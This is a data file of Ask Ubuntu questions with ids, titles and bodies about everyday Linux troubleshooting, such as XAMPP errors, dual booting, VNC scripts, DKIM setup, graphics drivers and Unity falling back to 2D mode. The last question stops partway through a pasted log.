417771	object not found in lampp ubuntu 13.10	i am a newbie linux user . i have installed xampp 1.8.3-2 ( lampp ) on ubuntu 13.10 and configured it . i paste my www folder to ubuntu 13.10 in /opt/lampp/htdocs . now that the owner of www folder is root , with create and delete files permission , i changed the permissions with : sudo chmod 777 -r /opt/lampp/htdocs/www i can access my old files inside www directory , and results in viewing webpage in the browser , with the url of localhost/xampp/www/xxx/abc.php . i can create files like aaa.php inside www but when i am trying view aaa.php file its says object not found the requested url was not found on this server . if you entered the url manually please check your spelling and try again.` if you think this is a server error , please contact the webmaster.` error 404 localhost apache/2.4.7 ( unix ) openssl/1.0.1e php/5.5.6 mod_perl/2.0.8-dev perl/v5.16.3 can not execute new files , and i can not execute modified code . any suggestions ? thanks .
417772	how to install fresh ubuntu 12.04 lts 64 bit over 12.04 lts 32 bit in dual boot alongside vista 64 bit on seperate disc partitions	i currently have vista 64 bit and ubuntu 32 bit on two seperate disc partitions.i am trying to do a fresh install of ubuntu 12.04 64 bit as i had mistakenly installed the 32 bit 12.04 a little while ago ( i am clear that i dont want the existing 32 bit ubuntu or any of its files on my system ) . now i have downloaded the ubuntu-12.04.4-desktop-amd64.iso and made a bootable flash disc with universal-usb-installer-1.9.5.2 utility . ( exactly the same procedure as i had followed for installing the 32 bit system but the iso now i used was the 64 bit one . the problem at hand is that when i boot my system with usb disk as the first option then too my pc does not boot from the usb and what i get is the ubuntu screen giving me an option to either load ubuntu or vista . what should i do ?
417774	monitor switches out of clone mode to dual monitors when logging in .	on my laptop , the login screen clones the video onto the second display ( this is what i want it to do ) , then after logging in it switches to two desktops . i have nvidia settings to clone . on second monitor , but on the compiz video setting the clone display is grayed out . using gnome-session-fallback because i like the classic view . so , is there something i missed to get it to clone after i log in ? it seems the x server is doing what i want . is there a native x server desktop that i can use ? i 'm going to install different window managers to see if this issue can go away and use that manager for clone display purposes . ( even though i like gnome . i do n't like the new ubuntu sidebar and that app menu is hideously unorganized grouping all the applications together . maybe if they made it so people could organize it so there is subsections and not just applications like a smart phone )
417775	how can i fix this vncserver startup script ?	i 've been working on getting multiple remote desktops up-and-running on my new installation of ubuntu 12.04.3 by following this guide : http : //www.freetutorialssubmit.com/ubuntu+remote+desktop+multiple+users i have successfully used it to create remote desktops that i can access from my windows machine with tightvnc , but i am having trouble getting the startup script to run . i have modified the configuration file from the linked example . here 's mine : vncservers= '' 2 : main 3 : noah 4 : john '' vncserverargs [ 2 ] = '' -geometry 1024×768 -depth 24 '' vncserverargs [ 3 ] = '' -geometry 1024×768 -depth 24 '' vncserverargs [ 4 ] = '' -geometry 1024×768 -depth 24 '' and my /etc/init.d/vncserver script is exactly the same as his . when i proceed to the service vncserver stop and service vncserver start steps , i get the following error : /etc/init.d/vncserver : line 14 : syntax error near unexpected token `|' /etc/init.d/vncserver : line 14 : ` for display in $ { vncservers } | > ' but i do n't know a thing about startup scripts so i do n't know how to troubleshoot this !
417777	ca n't connect to a wired network	as the title says my computer ca n't seem to connect to a wired network . the computer is currently running ubuntu 13.10 but before was running windows xp . when it ran xp to could connect to a network fine but after the switch it would n't . the computer has an ht2000 mcp61pm-am rev 1.0 motherboard and it 's using the built-in rj-45 port . i 've spent hours looking solutions but all the ones i 've found seem to a internet connection which i do n't have . does any one know a fix or where i could locate one ? sudo ifconfig : link encap : local loopback inet addr:1270.0.1 mask : 255.0.0.0 inet6 addr : : :1/128 scpoe : host up loopback running mtu:65536 metric:1 rx packets:112 errors:0 dropped:0 overruns:0 frame:0 tx packets:112 errors:0 dropped:0 overruns:0 frame:0 collisions:0 txqueuelen:0 rx bytes:8896 ( 8.8 kb ) tx bytes:8896 ( 8.8 kb ) sudo lspci : 00:00.0 ram memory : nvidia corporation mcp61 memory controller ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lcp bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a2 ) 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a2 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforge 430 ] ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:06.0 network controller : broadcom corporation bcm4321 802.11b/g/n ( rev 01 )
417780	slideshow and video application	i am looking for a way that i can place a handful of mixed images ( jpg ) and videos ( avi ? , mp4 ? ) in a directory and loop through them continuously , in full screen , creating a slideshow from the images and playing the videos . i do require the ability to add and remove files from that directory , and have the outputting show reflecting the changes . transition effects would be nice , but are not required . a little bit of bash or python scripting would be fine , but i would like to avoid a full custom software .
417784	random connection with virtual dns !	first of all , this scheme worked normally on debian . i have centos installed via vm on ubuntu . and there are dns ( bind ) and apache on centos . there are also sites like : 1.mydomain , ... , 10.mydomain . all of them are available on the same ip of vm . i 'm trying to access these sites from ubuntu . iptables on centos is switched off at all , on ubuntu i run `` sudo iptables -f '' . but my sites are available for mozilla browser and i ca n't access them via terminal , for example : $ host 1.mydomain host 1.mydomain not found : 3 ( nxdomain ) the same command on the centos gives proper result with the server 's ip . moreover sometimes it finds the server from ubuntu and everything works properly ! what 's happening ?
417786	how to allow multiple users to use the x display ?	i got a physical machine running ubuntu 12.10 server edition along with a x server + unity . i would like to remotely connect to this machine through ssh to run a graphical application over the remote display ( which is :0 ) . for this i wrote the following script : # ! /bin/bash display=:0 ; export display /path/to/my/graphical/app it only works if i execute that script from the user who started x/unity at the remote machine 's boot time . but i need to be able to do the same from any possible user logging in through ssh . any suggestions ? thank you .
417787	how to clear recent history in xubuntu 12.04	first , i know how to do it in ubuntu . i could use activity log manager to clear recent history . however , it does not work on xubuntu 12.04 . the `` recently used '' history is always there after i tried using activity log manager to clear all history . in addition , bleachbit and activity journal both do not work .
417790	enable laptop subwoofer	i 'm pretty new to linux ( second day on ubuntu ) and i noticed very poor sound quality compared to windows and realized it was because my subwoofer was n't playing . i have absolutely no clue as to where to even start to fix this problem , i have searched for hours and have not found a way to fix this . i am running ubuntu 13.10 on an alienware m14xr1 it has a 2.1 speaker system but for some reason i only get a 2.0 or 4.0 option . i already know installing realtek acl665 drivers wo n't work as my soundcard disappeared when i tried this . my audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 )
417794	how do i get my menu options back in libreoffice ?	i have ubuntu 13.10 , and libreoffice has been fully functional until the other day . i opened the software , and several essential options are gone , grayed out . i can not open a new file/document , open a recent file , ca n't open anything really , unless i open it directly from the file browser . but even then , i can not save any changes , i ca n't even exit the program unless i x on the top left . the entire suite has practically become a useless shell of a program ! the only thing i can think that is different is i may have done a software update from the software manager thingy ( i 'm not ubuntu savy yet , obviously ) . can anyone help me get some functionality back ? ?
417796	unable to connect to the internet	when i run ubuntu 12.04.3 on vmware player , the following message is displayed : can not connect the virtual device sata0:1 because no corresponding device is available on the host . do you want to try to connect this virtual device every time you power on the virtual machine ? yes/no would that be the cause for the connection problem ? if so , how can i fix it ? thanks in advance for your help .
417798	how to concate strings in a bash script to use in sql-statement ?	i would like to do the following in a bash script : read some filenames out of an file with filenames set a variable input path concat 1. and 2. use 3. in sql-statement here my code : # ! /bin/bash inpath= '' /home/bono/rd/bv-out/ '' while read line do rd= '' $ line '' rdfile= '' $ inpath $ rd '' echo -e $ rdfile # # # mysqls : mysql -u root -d rd -- local-infile < < eof load data local infile ' $ rdfile' into table bv_tmp_all fields terminated by ' ; ' lines terminated by '\r\n ' ; eof # # # # # eosql done < /home/bono/rd/bv-out/allto468 the echo shows the right path and filenamen but mysql always says : not found ( errcode : 2 - file or directory not found ) i 've tried different ways to concate the two strings but none worked : ( the following code works with mysql ( without the concate ) but it is not what i need : # ! /bin/bash while read line do rdfile= '' /home/bono/rd/bv-out/468-r11 '' echo -e $ rdfile # # # mysqls : mysql -u root -d rd -- local-infile < < eof load data local infile ' $ rdfile' into table bv_tmp_all fields terminated by ' ; ' lines terminated by '\r\n ' ; eof # # # # # eosql done < /home/bono/rd/bv-out/allto468 what is wrong with the concate ?
417799	missing 720p with dell u2312hm	i 'm missing 720p resolution and when i use 1080p the screen flickers - video . so i had to choose some of the 4:3 resolutions to stop the flicker . i do n't use xorg.conf any idea how to stop the flicker while using 1080p resolution and/or make 720p resolution available . on ubuntu 13.10 x64 , kernel 3.13.2 , radeon hd 4500 , using the open source drivers - oibaf updated and optimized open graphics drivers grub configuration : grub_cmdline_linux_default= '' quiet acpi_osi=linux pcie_aspm=force '' grub_cmdline_linux= '' acpi.power_nocheck=1 radeon.agpmode=1 radeon.pcie_gen2=1 radeon.msi=1 radeon.modeset=1 ''
417802	12.04 opendkim no key found	setup postfix and dovecot with opendkim . i am not getting key found . below are the postconf and opendkim file configs . postconf -n root @ mysite : ~ # postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix home_mailbox = inet_interfaces = all inet_protocols = all mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 milter_default_action = accept milter_protocol = 2 mydestination = mysite.com , mail.mysite.com , localhost.localdomain , localhost myhostname = mail.rerunapp.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = /etc/mailname non_smtpd_milters = inet : localhost:8891 queue_directory = /var/spool/postfix readme_directory = no recipient_delimiter = + relayhost = smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash : /etc/postfix/sasl/sasl-passwords smtp_sasl_security_options = noanonymous smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_milters = inet : localhost:8891 smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = no smtpd_sasl_local_domain = smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_restrictions = smtpd_tls_auth_only = no smtpd_tls_cert_file = /root/mysite.com.ssl/mysite.com.crt smtpd_tls_key_file = /root/mysite.com.ssl/mysite.com.key smtpd_tls_loglevel = 3 smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = ! sslv2 smtpd_tls_received_header = no smtpd_tls_security_level = may smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom /etc/opendkim.conf root @ xxxxx : ~ # cat /etc/opendkim.conf # this is a basic configuration that can easily be adapted to suit a standard # installation . for more advanced options , see opendkim.conf ( 5 ) and/or # /usr/share/doc/opendkim/examples/opendkim.conf.sample . autorestart yes autorestartrate 10/1h # log to syslog syslog yes # required to use local socket with mtas that access the socket as a non- # privileged user ( e.g . postfix ) umask 002 # sign for example.com with key in /etc/mail/dkim.key using # selector '2007 ' ( e.g . 2007._domainkey.example.com ) # domain example.com # keyfile /etc/mail/dkim.key # selector 2007 domain mysite.com keyfile /etc/opendkim/201402.private # see bellow how to generate and set up the key selector 201402 # commonly-used options ; the commented-out versions show the defaults . canonicalization relaxed/simple externalignorelist refile : /etc/opendkim/trustedhosts internalhosts refile : /etc/opendkim/trustedhosts keytable refile : /etc/opendkim/keytable logwhy yes mode sv pidfile /var/run/opendkim/opendkim.pid signaturealgorithm rsa-sha256 signingtable refile : etc/opendkim/signingtable socket inet:8891 @ localhost syslogsuccess yes temporarydirectory /var/temp userid opendkim : opendkim # mode sv subdomains yes # adspdiscard no # always oversign from ( sign using actual from and a null from to prevent # malicious signatures header fields ( from and/or others ) between the signer # and the verifier . from is oversigned by default in the debian pacakge # because it is often the identity key used by reputation systems and thus # somewhat security sensitive . oversignheaders from # list domains to use for rfc 6541 dkim authorized third-party signatures # ( atps ) ( experimental ) # atpsdomains example.com /etc/opendkim root @ xxxxxx : /etc/opendkim # ls -ltr total 24 -rw-r -- r -- 1 root root 48 dec 10 15:53 signingtable -rw-r -- r -- 1 root root 58 jan 30 01:25 trustedhosts drwxr-xr-x 3 root root 4096 jan 30 14:18 keys -rw -- -- -- - 1 opendkim opendkim 883 jan 30 14:33 201402.private -rw-r -- r -- 1 root root 83 feb 7 10:03 keytable -rw -- -- -- - 1 root root 308 feb 7 10:24 201402.txt opendkim-testkey root @ xxxx : /etc/opendkim # opendkim-testkey -d xxxx.com -s 201402 -k 201402.private -vvv opendkim-testkey : key loaded from 201402.private opendkim-testkey : checking key '201402._domainkey.xxxx.com' opendkim-testkey : no key please let me know if i am missing anything .
417806	how can i fix internet connection problem ?	i am using ubuntu-12.04.3 , installing it on vmware player . for a few weeks right after the installation , the internet connection was fine and working well . but recently the internet connection has stopped working.the following message displayed on the screen : can not connect the virtual device sata0:1 because no corresponding device is available on the host . do you want to try to connect this virtual device every time you power on the virtual machine ? yes/no how can i fix this ? thanks in advance for your help .
417810	gnome session - deleted by mistake the status menu at right in bottom panel	i do n't know how to search my problem cause i do n't know how he call the things on the bottom bar at unity . i installed gnome fallback from ubuntu software center and i choose gnome classic ( no effects ) and two minutes later i deleted by alt + delete from panel option . and it turned into : ( i add the logout button to go back to unity to write this question ) the problem is not in unity but in gnome session . unity picture gnome ( after my stupid action ) picture i used this guide to take the idea to download gnome . and i looked only the 12.04 guide . i think that my question is useful , please add comments below if i miss to say something that is important . thanks , george
417811	problem with installing ubuntu 12.04.3 lts	i just downloaded ubuntu 12.04.3 lts . i can get it to boot and all that . when i try to install it though is whats my problem . it opens up and its preparing to install ubuntu.. it says for the best results make sure your computer has 4.5gb of space , plugged in , connected to the internet . of which i am on all of those . but when i go to click continue . it does absolutely nothing . i get stuck with the spinning wheel like its trying to do something , even though it is doing nothing . my laptop recently pretty much crashed on me . i ca n't load windows anymore . i do believe its not even on the hard drive anymore . anyways . im having this problem , i literally have looked everywhere i can to find an answer , and got no where . its really annoying . my desktop is so god damn slow . please someone have an answer for me .
417814	ubuntu 12.04 problems	i come in peace : ) after paying a visit to couple windows alternatives here on linux , like debian , mint and fedora i realized that i prefer ubuntu more , even with a debian 7 being more stable , it gets my attention . these are the problems i ran into along these distros and i was hoping you could help me fix them : first of all , my setup : laptop emachines-eme529 intel dual core 2.0 ghz intel hd graphics ( not sure what exact chipset ) 320 gb hdd 4 gb ram dual-booting with windows 7 problems : wifi does n't work as well as it works on windows 7 ( i am about 6 feet from wifi source ) -on windows is a full signal , but on linux ( ubuntu now ) is 4/5 bars and sometimes unplugs itself graphics card is not working properly with noveau drivers ( are the stock ones called like that ? ) example : team fortress 2 running crispy and smoothly on windows , but on ubuntu , it can barely run it brightness controls do n't work ... it shows the message but the screen does n't do anything ( there was a mint fix for that but it was a year ago and i ca n't find it , not sure if it will work on ubunutu ) flash player totaly sucks on linux and i understand that they wo n't support it , but is there some kind of a complete fix for it ? there is probably more but i could live with those and fix them eventually *note that i have tried the graphics fix on debian and messed it up so badly i had to reinstall it.. if i could get this 4-5 flaws to fix and work on ubuntu , i would essentially replace windows with it . all i am asking from a community is help with this..even if you gave me a link to a solution , as long as i stop searching a needle in a hay stack.. thank you all in advance , live long and prosper ! ; )
417816	second hard drive seems to randomly freeze or unmount	i tracing down a problem with a second hard drive and am now stumped . my setup : dell inspiron 17r-5721 , 8gb ram , running ubuntu 13.10 , primary drive is kingston 120gb ssd , secondary drive is a seagate st1000lm024 hn-m installed in the cdrom tray . i run a vmware workstation stored completely on the seagate drive . everything was working fine until about 4 weeks ago . now vmware comes up with a nvram error and the vitual machine hangs because it ca n't write to the disk . i get a corrupted vmdk file and the virtual machine is damaged beyond repair . when the virtual machine is running and the error hits , the secondary drive seems unresponsive . i try to use the host ubuntu system to browse the files using nautilus on the secondary drive and the drive does n't respond for 4-5 seconds . it seems like it was either unmounted and needs time to remount or something to where the ubuntu os is waiting on the drive . for example , nautilus has the `` loading ... '' status in the bottom right of the window . i think the failure is in the connection of the drive and not vmware nor the drive hardware . i 've checked the smart status of the drive and all is okay . no bad sectors or any other warnings . i 've even reformatted the drive . i played with the mount options of the drive and have had the same problem . since the drive does n't seem to be failing , i do n't think replacing it is going to fix the problem . edit : as for the drive power management : standby : never , apm level 255 , aam is off , and i 've tried to enable and disable write caching . any thoughts on where to look for other clues ?
417822	i am not able to install ubuntu 12.04	hey i had downloaded the ubuntu for desktop 32 bits and had created a bootable cd and tried to installl it on my dell inspiron 6000 with 512 mb ram and 1.5 ghz intel entium processor but i dont know what happens while installin mid way it just says getting back to text console and it cant even load back to the console in one night ( i had left it like that the whole night ! ) plz help me !
417826	which graphics divers should i use ?	i 'm on xubuntu 13.10 64 bit . the output of lspci , lspci | less , and lspci -v is here . ubuntu tells me that there are 3 video cards drivers compatible with my pc . by default xubuntu picked the first one . but which one of these 3 is the best ? which one should i use ?
417827	how to uninstall brother drivers ?	how do i fix this ? /sbin/ldconfig.real : /usr/lib/libbrscandec2.so.1 is not a symbolic link /sbin/ldconfig.real : /usr/lib/libbrcolm2.so.1 is not a symbolic link more relevantly , how do i uninstall the brother scanner driver ? the instructions at the brother webpage : uninstall the scanner driver note : please make sure scan-key-tool is uninstalled before the uninstallation . uninstall scan-key-tool 1 . login as a superuser ( or use `` sudo '' option if it is required ) 2 . uninstall scanner driver command ( for dpkg ) : dpkg -p ( scanner-driver-name ) do n't work , see below mark @ lexington : ~/downloads/brother $ sudo dpkg -p brscan2-0.2.5-1.amd64.deb dpkg : error : you must specify packages by their own names , not by quoting the names of the files they come in yes , i have a 64-bit installation .
417828	black screen during installation	i have an acer aspire one ao532h . i have tried to install `` ubuntu-12.04.3-desktop-i386 '' via pen drive but after clicking on install ubuntu , nothing comes just a black screen
417829	how can i add flash player to lubuntu live dvd ?	i have an old pc with broken hard disk , and would like to use lubuntu 13.10 live dvd . i am using this old pc mostly for browsing net , watching videos and livestreams . so , i have downloaded latest lubuntu 13.10.iso and burned it to dvd . i tried it on old pc , it works fine , everything is recognized , wifi works , firefox comes preinstalled , but i would like to have flash player installed too . i need flash player for many sites i am watching videos and livestreams from . so , how could i add/customize lubuntu installation and add flash player on it ? also , i would like , if possible to add some more software like are : vlc player , audacious , kate , okular ... ( but , i could live without these , only flash player is priority ) .
417830	titanium studio in ubuntu 12.04 lts	how to install titanium studio in ubuntu . step by step the latest one . plss help . im getting an error jvm terminated . exit code=13 /usr/bin/java -xms128m -xmx1024m -xx : maxpermsize=256m -xverify : none -declipse.p2.unsignedpolicy=allow -declipse.log.size.max=10000 -declipse.log.backup.max=5 -djava.awt.headless=true -jar /home/aoi/applications/titanium_studio//plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar -os linux -ws gtk -arch x86 -showsplash -launcher /home/aoi/applications/titanium_studio/titaniumstudio -name titanium studio -- launcher.library /home/aoi/applications/titanium_studio//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.200.v20130807-1835/eclipse_1506.so -startup /home/aoi/applications/titanium_studio//plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar -- launcher.overridevmargs -exitdata e44800b -vm /usr/bin/java -vmargs -xms128m -xmx1024m -xx : maxpermsize=256m -xverify : none -declipse.p2.unsignedpolicy=allow -declipse.log.size.max=10000 -declipse.log.backup.max=5 -djava.awt.headless=true -jar /home/aoi/applications/titanium_studio//plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar i try to do the sudo apt-get install openjdk-6-jdk but still no luck . i tried javac -version it says $ javac -version javac 1.6.0_27
417835	certification validation issues with ppa	so i just installed ubuntu on my computer at work and when i try to add a ppa i get the following message : can not add ppa : ' '' error reading https : //launchpad.net/api/1.0/~libreoffice/+archive/ppa : ( 60 , 'server certificate verification failed . cafile : /etc/ssl/certs/ca-certificates.crt crlfile : none ' ) '' ' . i have tried various things that i have found in other forums but have n't had any success . some of the things i have tried : setting the time sudo apt-get install -- reinstall ca-certificates i have tried adding the following ppas : sudo apt-add-repository ppa : libreoffice/ppa sudo add-apt-repository ppa : xorg-edgers/ppa any idea why i am getting the error and how to fix it ?
417836	monitor traffic generated by an ip on squid proxy server ?	i 'm using squid proxy server with ubuntu 12.04.03 lts to provide secure access to internet in my lan . but i also want to create log of each user which access network through proxy so that to can be useful to trace criminal activity . is there anyway i can maintain a database of user activity on my proxy server , with the ip & content accessed by users via my proxy server .
417837	how to make the path of a symbolically linked directory the exactly the path of the original directory ?	i have created a symbolic link on my desktop that links to my /var/www/wordpress dir via $ ln -s /var/www/wordpress/ ~/desktop/wordpress-link when i open bash and cd into ~/desktop/wordpress-link i notice that the path is : max @ laptop : ~/desktop/wordpress-link running pwd shows me the same path as above . when i do ls i see asterixis next to most of the files . if i open a file in sublime text while in max @ laptop : ~/desktop/wwwordpress i can see that the path of the file is actually /var/www/wordpress/file-name.php so i know i am linked to the proper file . the problem is that it just feels messed up to see bash telling me that i am in ~/desktop/wordpress-link when i am really in /var/www/wordpress/ . also the asterixis are unsettling . is there a way to make it so that when i cd or click into ~/desktop/wordpress-link that i will actually be in the linked dir and see /var/www/wordpress as my path name ?
417838	how to connect to wired/wireless internet	my friend recently gave me a linux desktop of his . i 'm unsure of the exact specifications , but i believe it uses an intel wireless card . i 'm running ubuntu 10.04 . it 's a lenovo desktop , and was sold with windows xp . i 'm trying to connect to my router , but it 's proving unsuccessful . if , using the terminal , i enter `` ifconfig wlan0 `` it tells me the device is n't found . i plugged an ethernet cable in . when i tried entering `` nm-tool `` , it tells me the type is wired , my driver is e100 , and state is disconnected . if anyone has a solution it 'd be greatly appreciated , as a longtime windows user this does n't make sense to me .
417839	issue when sudo something after a hostname change	i was tired of my system 's name so i decided to change it . i gksudo gedit /etc/hostname and changed my first and never touched computer name to a new one . then now when i sudo something like sudo gedit my terminal prompts ~ : unable to resolve host < my_new host_name_i_gksudo > . when i sudo cat /etc/hosts it gives me : sudo : unable to resolve host < not_of_your_business ! > 127.0.0.1 localhost 127.0.1.1 leviathan # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters how could i get rid of this problem ? thanks in advance .
417840	hibernate missing in login screen	re-enabling hibernation by adding a rule to policy kit added the option to hibernate to the desktop session as expected , but not for the login screen . how can i enable hibernation right from the login screen on 14.04 ?
417848	which version of ubuntu is compatible with my hardware ?	i am using an old millennia desktop - here are the specs : cpu : pentium iii 866.4 mhz l1 cache : 16k 8097 mb/s l2 cache : 256k 3686 mb/s l3 cache : none memory : 320m 343 mb/s chipset : via apollo pro/133/133a i am trying to install 11.10 server because that is the latest non dvd operating system . however when i try it only gives me a blank screen and the 'caps lock ' and 'scroll lock ' keyboard lights flash . i looked at the 11.10 requirements and it says i only need : ubuntu server ( cli ) installation 300 mhz x86 processor 128 mib of system memory ( ram ) ( 256 mib for a virtual installation ) 1 gb of disk space graphics card and monitor capable of 640x480 cd drive what did i miss ?
417850	13.10 and issues with sony vaio svs 15116fxs fan and hard drive	i 've got a sony vaio svs15116fxs laptop . currently i 'm running ubuntu 13.10 64-bit . everything seems to run well , except for two things : 1 ) the fan currently runs at apparently the same speed , and it runs all the time . one the fan is loud and two , i think this might be related to second issue : 2 ) the laptop seems to have an issue with overheating the hard drive . it seems to get hot running on the right hand side . this is where the hard drive and the nvidia geforce graphics card is located . so far , i 've had two hard drives fail on me . the first i think was my fault , but the second died after only 3 months of being installed . i 'm starting to hear squeaking from the hard drive i used to replace it as well . viaofand does not work for my model . pwmconfig just spits out this message : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed . i 've ran across some forums suggesting that opensuse includes drivers that are not typically included in other linux distributions and that other vaio owners have found that distro to be quite useful . i 'd like to stick with ubuntu if i can though . here is the output from lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m le ] ( rev ff ) i have bumblebee installed and only optirun for games , videos , and image rendering/editing applications . occasionally i use it to run firefox . thanks in advance for taking the time to help !
417851	installing ubuntu on a 16 gb ssd	i 'm pretty new to linux , and i 'm trying to make a dual boot now to try to learn it . but i 'm having some difficulties because i want it in a pretty weird way . first of all , my laptop has 3 drives , a 16 gb msata ssd , a 120 gb ssd and a 1 tb ( 900 gb ) hdd , the 120 gb ssd i use for windows 8 , and the 1 tb drive has a 800 gb partition for my data in windows , and a 100 gb partition i want to use for ubuntu data . what i 'm trying to accomplish is : i want to install/boot ubuntu from my 16 gb ssd , but store everything except for the system files on the 100 gb partition , so it 'll boot fast , and i 've got enough space for my programs , is this possible and if so , how ? : ) thanks in advance .
417852	display resolution & unity : were perfect before restart	today i rebooted my system , after an uptime of 11+ days ( suspending once daily ) and after an update a few days ago that invlolved fglrx , to see that the screen resolution has changed . in `` displays '' in the settings , the were only two resolution options : 1024x768 and 800x600 . moreover , all the launcher icons were larger ( i had them smaller than the default using myunity ) . when opening myunity i got the following message : your ubuntu 12.04 is running in 2d mode . many features will not be available . i tried rebooting several times with nothing changing . i tried installing mesa-utils as per http : //askubuntu.com/a/85322 but nothing changed either . i finally removed the xorg config file as per http : //askubuntu.com/a/407663 : sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.nvidia when i rebooted the resolution was back to normal and the other resolutions reappeared under `` displays '' . the issue that remains is that i am stuck in 2d . how can i go back to normal mode ? ( and yes i did logout and select `` unity '' instead of `` unity 2d '' ) moreover , can someone help explain why this occurred ? technical info : nvidia gf119 [ geforce gt 520m ] , ati rv730 xt [ mobility radeon hd 4670 , ubuntu 12.04.4 , kernel 3.2.0-58-generic . thanks update so i searched again and found out the same issue here : how to change from unity 2d to 3d ? but my case is a laptop ; i can not upgrade my card . moreover , it was working normally . what happened i can not understand . if it helps , here are some more info ( lines with `` ... '' indicate repeated lines : $ /usr/lib/nux/unity_support_test x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 135 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 user @ home : ~ $ unity -- replace checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x3e00004 ... . initializing composite options ... done compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - error : initscreen failed compiz ( core ) - error : could n't activate plugin 'opengl' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 ... . initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 initializing resize options ... done initializing place options ... done initializing move options ... done compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'wall ' failed compiz ( core ) - error : could n't activate plugin 'wall' compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 initializing grid options ... done i/o warning : failed to load external entity `` /home/user/.compiz/session/103b5073b092edf68e139368147689533800000024950007 '' initializing session options ... done initializing gnomecompat options ... done compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'animation ' failed compiz ( core ) - error : could n't activate plugin 'animation' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'fade ' failed compiz ( core ) - error : could n't activate plugin 'fade' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'unitymtgrabhandles ' failed compiz ( core ) - error : could n't activate plugin 'unitymtgrabhandles' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 initializing workarounds options ... done compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'scale ' failed compiz ( core ) - error : could n't activate plugin 'scale' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'expo ' failed compiz ( core ) - error : could n't activate plugin 'expo' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'ezoom ' failed compiz ( core ) - error : could n't activate plugin 'ezoom' compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'unityshell ' failed compiz ( core ) - error : could n't activate plugin 'unityshell' compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl 